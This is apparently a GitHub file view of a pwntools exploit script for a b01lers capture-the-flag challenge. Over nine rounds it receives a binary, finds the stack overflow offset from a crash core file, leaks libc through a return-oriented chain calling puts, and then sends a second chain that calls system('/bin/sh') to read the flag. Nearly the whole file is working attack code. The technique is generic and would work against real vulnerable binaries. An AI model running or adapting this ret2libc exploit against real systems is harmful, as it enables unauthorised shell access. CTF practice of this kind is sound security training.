-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.py
executable file
·127 lines (100 loc) · 3.11 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host chal.b01lers.com --port 4001
from pwn import *
from IPython import embed
import codecs
# Set up pwntools for the correct architecture
libc = ELF("./libc6_2.31-0ubuntu9_amd64.so")
ld = ELF("./ld-2.31.so")
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'chal.b01lers.com'
port = int(args.PORT or 4001)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
return io
def start(argv=[], *a, **kw):
return remote(argv, *a, **kw)
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
problem = 0
io = start()
io.recvline()
io.recvline()
io.recvline()
io.recvline()
while problem < 9:
io.recvuntil("b")
raw = io.recvuntil(": \n")
raw = raw[1:raw.rfind(b"'")]
b = codecs.escape_decode(raw)[0]
f = open('bin', 'wb')
f.write(b)
f.close()
exe = context.binary = ELF('bin')
p = process('./bin')
base = 0x400000
main = exe.symbols['main']
puts_plt = exe.plt['puts']
puts_got = exe.got['puts']
p.success("main address: {}".format(hex(main)))
p.success("puts_plt address: {}".format(hex(puts_plt)))
p.success("puts_got address: {}".format(hex(puts_got)))
p.recvuntil(": \n")
p.sendline(cyclic(0x80, n=8))
p.recvall()
core = p.corefile
fault = cyclic_find(core.fault_addr, n=8)
rop = ROP(exe)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]
leak_payload = flat({
fault: [
pop_rdi,
puts_got,
puts_plt,
main,
]
})
io.sendline(leak_payload)
io.recvuntil(('Got: \n', 'Hello, \n'))
io.recvline()
libc_leak = io.recvline()[:-1]
libc.address = u64(libc_leak.ljust(8, b'\x00')) - (libc.symbols['puts'] - libc.address)
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']
io.success("libc address: {}".format(hex(libc.address)))
io.success("/bin/sh address: {}".format(hex(bin_sh)))
io.success("system address: {}".format(hex(system)))
shell_payload = flat({
fault: [
ret,
pop_rdi,
bin_sh,
system,
]
})
io.sendline(shell_payload)
io.recvuntil(('Got: \n', 'Hello, \n'))
io.recvline()
io.sendline('cat flag.txt')
flag = io.recvuntil('}')
io.success("Flag: {}".format(flag))
io.sendline('exit')
io.recvuntil('flag>')
io.sendline(flag)
problem += 1
io.interactive()